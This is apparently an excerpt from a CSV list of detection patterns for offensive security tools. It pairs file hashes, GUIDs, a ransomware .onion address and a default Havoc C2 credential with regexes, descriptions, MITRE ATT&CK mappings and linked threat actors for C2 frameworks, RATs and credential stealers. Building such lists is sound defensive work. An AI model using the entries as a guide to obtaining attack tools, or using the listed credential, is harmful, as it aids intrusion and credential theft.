"*5ntlvn7lmkezscee2vhatjaigkcu2rzj3bwhqaz32snmqc4jha3gcjad.onion*",".{0,1000}5ntlvn7lmkezscee2vhatjaigkcu2rzj3bwhqaz32snmqc4jha3gcjad\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","27684"
"*5slcifus86ojqs51ubctih0p35izi3x6ynyo2q2pnqs7syvnqa*",".{0,1000}5slcifus86ojqs51ubctih0p35izi3x6ynyo2q2pnqs7syvnqa.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#certificate","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27685"
"*5spider:password1234*",".{0,1000}5spider\:password1234.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","27686"
"*60015ca2e810e1e04f6e7eb58ea019bcf0629a0f3e7ab370a7d9f7ad7bdf0420*",".{0,1000}60015ca2e810e1e04f6e7eb58ea019bcf0629a0f3e7ab370a7d9f7ad7bdf0420.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27687"
"*6003ae86c0abcc19ae6c799724e679762ed37934ab6b5c3064f65988df64a242*",".{0,1000}6003ae86c0abcc19ae6c799724e679762ed37934ab6b5c3064f65988df64a242.{0,1000}","offensive_tool_keyword","HVNC","Standalone HVNC Client & Server Coded in C++ (Modified Tinynuke)","T1021.005 - T1071 - T1563.002 - T1219","TA0001 - TA0002 - TA0008","N/A","N/A","RMM","https://github.com/Meltedd/HVNC","1","0","#filehash","N/A","10","5","445","133","2025-03-27T21:20:10Z","2021-09-03T17:34:44Z","27688"
"*60049ba3c5bb513e7ab79467f76fd71f2c38a697bcca3ef1949dd31720420555*",".{0,1000}60049ba3c5bb513e7ab79467f76fd71f2c38a697bcca3ef1949dd31720420555.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#filehash","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","27689"
"*6009ef1efbb6273b711b329e0a9a7697b2eba2b0538d1a2b1fa160ef30e8d5a8*",".{0,1000}6009ef1efbb6273b711b329e0a9a7697b2eba2b0538d1a2b1fa160ef30e8d5a8.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","27690"
"*600a76fba6033e9f4a42fb3154c2f0fdc7decfc3794cb37efc2f4847739b4a4a*",".{0,1000}600a76fba6033e9f4a42fb3154c2f0fdc7decfc3794cb37efc2f4847739b4a4a.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","27691"
"*600f564845d4257540556c7dd75333ad0a206c3ce9e88048db23c0ff5396f3f0*",".{0,1000}600f564845d4257540556c7dd75333ad0a206c3ce9e88048db23c0ff5396f3f0.{0,1000}","offensive_tool_keyword","OSEP-Code-Snippets","notable code snippets for Offensive Security's PEN-300 (OSEP) course","T1116 - T1204.002 - T1027.009 - T1021.005 - T1560.001 - T1100 - T1003.001 - T1564.001 - T1047 - T1210 - T1134.002 - T1055 - T1055.011 - T1055.012 - T1204","TA0005 - TA0040 - TA0008 - TA0003 - TA0006 - TA0004","N/A","N/A","Exploitation tool","https://github.com/chvancooten/OSEP-Code-Snippets","1","0","#filehash","N/A","8","10","1254","444","2024-01-04T15:17:17Z","2021-03-10T21:34:41Z","27692"
"*601cbe74d7aed23f52bae7d326f08b86665c167b3d14fedfa545efb5a6e56d83*",".{0,1000}601cbe74d7aed23f52bae7d326f08b86665c167b3d14fedfa545efb5a6e56d83.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","27693"
"*602ca6be5b05c2a3d9ed9e038ce1fb3d030cc09cc5038ce751d0eeb3041f1f6a*",".{0,1000}602ca6be5b05c2a3d9ed9e038ce1fb3d030cc09cc5038ce751d0eeb3041f1f6a.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","27695"
"*602d67f4b63650f0e935953440895184e8edf2b4eab7bfdcf134bc02714156e0*",".{0,1000}602d67f4b63650f0e935953440895184e8edf2b4eab7bfdcf134bc02714156e0.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27696"
"*602e1ec82a4e6904a567a7e4c979b83a38fd5d734dd3d614d947365d40d5d579*",".{0,1000}602e1ec82a4e6904a567a7e4c979b83a38fd5d734dd3d614d947365d40d5d579.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","27697"
"*603db5a0982f09dcdff3ec26a28371bc5bdd6c867e344a52e3fef572769fb5b1*",".{0,1000}603db5a0982f09dcdff3ec26a28371bc5bdd6c867e344a52e3fef572769fb5b1.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","27699"
"*604f76c6478fa080af7052988d643c407a6851d5b4ed0a30858a54d6bf010445*",".{0,1000}604f76c6478fa080af7052988d643c407a6851d5b4ed0a30858a54d6bf010445.{0,1000}","offensive_tool_keyword","pico","hacker labs - open source and managed web services leveraging SSH","T1021.005 - T1078 - T1105 - T1109 - T1197 - T1213","TA0005 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/picosh/pico","1","0","#filehash","N/A","10","10","1129","36","2025-04-22T17:33:17Z","2022-08-24T03:14:52Z","27700"
"*60505a1d3406e698abd0d1019aff73029d23af426a60672d85780d0f6517fccf*",".{0,1000}60505a1d3406e698abd0d1019aff73029d23af426a60672d85780d0f6517fccf.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27701"
"*605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4*",".{0,1000}605861f833fc181c7cdcabd5577ddb8989bea332648a8f498b4eef89b8f85ad4.{0,1000}","offensive_tool_keyword","xz","backdoor in upstream xz/liblzma leading to ssh server compromise","T1174 - T1056 - T1210 - T1550 - T1036 - T1077","TA0005 - TA0006 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","Malware","https://securelist.com/xz-backdoor-story-part-1/112354/","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27702"
"*60586b8ebffb86b765ee2086189fa6e0e9e4346d1443e5c133fd5ae4e6b13277*",".{0,1000}60586b8ebffb86b765ee2086189fa6e0e9e4346d1443e5c133fd5ae4e6b13277.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","27703"
"*605e19b1230344fa63de6979e952594fa3505e47c91b5022ea0334971e6fe812*",".{0,1000}605e19b1230344fa63de6979e952594fa3505e47c91b5022ea0334971e6fe812.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27704"
"*605fba81b3a049064b1bff90a6ffba00cbde7e68cdb5c22cbaa197251fc0b081*",".{0,1000}605fba81b3a049064b1bff90a6ffba00cbde7e68cdb5c22cbaa197251fc0b081.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#filehash","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","27705"
"*606da919a03a92204bcd8653dfad8ebd79bc1a05b4760ce92c0d85eb2dc0439d*",".{0,1000}606da919a03a92204bcd8653dfad8ebd79bc1a05b4760ce92c0d85eb2dc0439d.{0,1000}","offensive_tool_keyword","Carbanak","remote backdoor used by a group of the same name (Carbanak). It is intended for espionage - data exfiltration and providing remote access to infected machines","T1021.002 - T1071.001 - T1105 - T1059 - T1003 - T1078 - T1041","TA0006 - TA0008 - TA0010 - TA0011","Carbanak","FIN7 - Carbanak","Malware","https://github.com/0x25bit/Updated-Carbanak-Source-with-Plugins","1","0","#filehash","N/A","10","4","396","223","2019-05-01T23:31:35Z","2019-04-22T21:01:08Z","27706"
"*60724a25dd319ec57b77e16c52e52a09c7b82ed4ea38dab6d6c2e880dcebb439*",".{0,1000}60724a25dd319ec57b77e16c52e52a09c7b82ed4ea38dab6d6c2e880dcebb439.{0,1000}","offensive_tool_keyword","netpass","When you connect to a network share on your LAN or to your .NET Passport account. Windows allows you to save your password in order to use it in each time that you connect the remote server. This utility recovers all network passwords stored on your system for the current logged-on user. It can also recover the passwords stored in Credentials file of external drive. as long as you know the last log-on password.","T1081 - T1003 - T1555","TA0006 - TA0009","N/A","Kimsuky - XDSpy - TRAVELING SPIDER","Credential Access","https://www.nirsoft.net/utils/network_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","27707"
"*6089b1431d6107150c713a5d83c664be739b2b2f179fab3fa51d1280c4124adc*",".{0,1000}6089b1431d6107150c713a5d83c664be739b2b2f179fab3fa51d1280c4124adc.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","27709"
"*608dc4ee1e7301aaa26bf7b95aa83ff1b5464f366deb206c4c148434e1970ccb*",".{0,1000}608dc4ee1e7301aaa26bf7b95aa83ff1b5464f366deb206c4c148434e1970ccb.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","27711"
"*608faa1b8a5144d7d610d78a4b4f8eb834c4c786cabc52fe8cabaf95df3ed02e*",".{0,1000}608faa1b8a5144d7d610d78a4b4f8eb834c4c786cabc52fe8cabaf95df3ed02e.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27712"
"*6093461c4db41a15fefc85a28e35a9e359d0e9452bbfd36ce1fbe7aa31e1f4f0*",".{0,1000}6093461c4db41a15fefc85a28e35a9e359d0e9452bbfd36ce1fbe7aa31e1f4f0.{0,1000}","offensive_tool_keyword","SharpMove",".NET Project for performing Authenticated Remote Execution","T1021 - T1106 - T1218","TA0002 - TA0008","N/A","N/A","Lateral Movement","https://github.com/0xthirteen/SharpMove","1","0","#filehash","N/A","8","4","393","66","2023-02-08T23:48:54Z","2020-01-24T22:21:04Z","27713"
"*60941d4aa4cd1943898c5ca2fa38dde695a90fae106d10e3d53d4f40bbe3e559*",".{0,1000}60941d4aa4cd1943898c5ca2fa38dde695a90fae106d10e3d53d4f40bbe3e559.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27714"
"*6098d11342a5c4da204bed3fb3f420ce4df1664eb68ff23a17e4898cb3a11e07*",".{0,1000}6098d11342a5c4da204bed3fb3f420ce4df1664eb68ff23a17e4898cb3a11e07.{0,1000}","offensive_tool_keyword","SharpAVKB","Windows Antivirus Comparison and Patch Number Comparison","T1082 - T1518 - T1083","TA0007","N/A","N/A","Discovery","https://github.com/uknowsec/SharpAVKB","1","0","#filehash","N/A","4","1","58","24","2019-10-28T06:50:30Z","2019-10-14T12:44:22Z","27715"
"*60997a4c7f91341633eeaedb0f9316d0ac734a03255b11da128bbc7ac7c3a102*",".{0,1000}60997a4c7f91341633eeaedb0f9316d0ac734a03255b11da128bbc7ac7c3a102.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","27716"
"*60a78c06f7db71904cc08748c5b507bd88ed8a08c31f21d8a796c562a3f0c5b9*",".{0,1000}60a78c06f7db71904cc08748c5b507bd88ed8a08c31f21d8a796c562a3f0c5b9.{0,1000}","offensive_tool_keyword","BrowserGhost","This is a tool for grabbing browser passwords","T1555.003 - T1555.013 - T1003.008","TA0006","N/A","N/A","Credential Access","https://github.com/QAX-A-Team/BrowserGhost","1","0","#filehash","N/A","10","10","1414","206","2022-05-21T14:09:45Z","2020-06-12T12:19:06Z","27717"
"*60BBE2CB-585B-4DBD-9CB9-22F00D3F11E5*",".{0,1000}60BBE2CB\-585B\-4DBD\-9CB9\-22F00D3F11E5.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","0","#GUIDproject","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","27719"
"*60C1DA68-85AC-43AB-9A2B-27FA345EC113*",".{0,1000}60C1DA68\-85AC\-43AB\-9A2B\-27FA345EC113.{0,1000}","offensive_tool_keyword","Throwback","HTTP/S Beaconing Implant","T1071.001 - T1102 - T1095 - T1573.001 - T1041","TA0011 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/silentbreaksec/Throwback","1","0","#GUIDproject","N/A","10","10","306","83","2017-08-25T16:49:12Z","2014-08-08T17:06:24Z","27720"
"*60c1ea95d10c8223eae771a2261117a4cbd7265b76e5dcf5bc0583f2a095de11*",".{0,1000}60c1ea95d10c8223eae771a2261117a4cbd7265b76e5dcf5bc0583f2a095de11.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","0","#filehash","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","27721"
"*60c72ba7ed39768fd066dda3fdc75bcb5fae6efb3a0b222a3f455526dcf08c96*",".{0,1000}60c72ba7ed39768fd066dda3fdc75bcb5fae6efb3a0b222a3f455526dcf08c96.{0,1000}","offensive_tool_keyword","CACTUSTORCH","A JavaScript and VBScript shellcode launcher. This will spawn a 32 bit version of the binary specified and inject shellcode into it.","T1055.011 - T1059.005 - T1059.007","TA0002 - TA0005","N/A","APT32","Exploitation tool","https://github.com/mdsecactivebreach/CACTUSTORCH","1","0","#filehash","N/A","8","10","1006","227","2018-07-03T06:47:36Z","2017-07-04T10:20:34Z","27722"
"*60D02E32-1711-4D9E-9AC2-10627C52EB40*",".{0,1000}60D02E32\-1711\-4D9E\-9AC2\-10627C52EB40.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz GUID project","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#GUIDproject","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","27724"
"*60dbd3f5c48a846c11f88bdc3d30de5f734edec91b1d18058223a50961195646*",".{0,1000}60dbd3f5c48a846c11f88bdc3d30de5f734edec91b1d18058223a50961195646.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27726"
"*60dd76856a5ee5988ae18a793f4916a17a7808d676a360921c3945d5eb939564*",".{0,1000}60dd76856a5ee5988ae18a793f4916a17a7808d676a360921c3945d5eb939564.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","27727"
"*60de3c5fb9a9dcab760da4377992481cb707fb5c1a633be197c332163b37919b*",".{0,1000}60de3c5fb9a9dcab760da4377992481cb707fb5c1a633be197c332163b37919b.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","27728"
"*60f25c8a290ba6185b07da48663cfc4662e2853e324bef2a272aede4c15260d2*",".{0,1000}60f25c8a290ba6185b07da48663cfc4662e2853e324bef2a272aede4c15260d2.{0,1000}","offensive_tool_keyword","winexe","Winexe remotely executes commands on Windows systems from GNU/Linux","T1059.004 - T1021.005 - T1078.003","TA0002 - TA0008 - TA0011","N/A","APT28","Lateral Movement","https://www.kali.org/tools/winexe/","1","0","#filehash #linux #windows","N/A","8","8","N/A","N/A","N/A","N/A","27734"
"*60f938d08d551800330090458997ee2944fd79478081275bbe609a25a786f67d*",".{0,1000}60f938d08d551800330090458997ee2944fd79478081275bbe609a25a786f67d.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","27736"
"*60f9d7ae7082d1c524ad8e38377662d82c6b32d3f5b9c5256df4d6e3aa74865e*",".{0,1000}60f9d7ae7082d1c524ad8e38377662d82c6b32d3f5b9c5256df4d6e3aa74865e.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","27737"
"*60faba8d3526efd03354e82efb9d9d272bbf39e7b3b5c785b35675d0791b377e*",".{0,1000}60faba8d3526efd03354e82efb9d9d272bbf39e7b3b5c785b35675d0791b377e.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27738"
"*610f948ee1af2ac334186ca21a3bea4d819a45fee51c2753fe1cd0bb8cc30d1d*",".{0,1000}610f948ee1af2ac334186ca21a3bea4d819a45fee51c2753fe1cd0bb8cc30d1d.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","27739"
"*61106960/adPEAS*",".{0,1000}61106960\/adPEAS.{0,1000}","offensive_tool_keyword","adPEAS","adPEAS is a Powershell tool to automate Active Directory enumeration -  wrapper for PowerView - PoshADCS - BloodHound and others","T1016 - T1087.002 - T1482 - T1207 - T1069","TA0007 - TA0008","N/A","N/A","Discovery","https://github.com/61106960/adPEAS","1","1","N/A","N/A","8","10","1095","132","2025-04-01T16:16:15Z","2020-12-23T08:10:19Z","27740"
"*6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da*",".{0,1000}6112fed1a30fcd45861afdbd13a6888f5cbeb6c3711d8262d6248eb4941aa2da.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","27741"
"*611ae2bc8e19ad9ab424348376850b3f257767965939579767e9ba15e9135ead*",".{0,1000}611ae2bc8e19ad9ab424348376850b3f257767965939579767e9ba15e9135ead.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","27742"
"*61241af5ce576034133175ae34bbf8107c57d0b7546b964ba6a436c9f5202638*",".{0,1000}61241af5ce576034133175ae34bbf8107c57d0b7546b964ba6a436c9f5202638.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","27744"
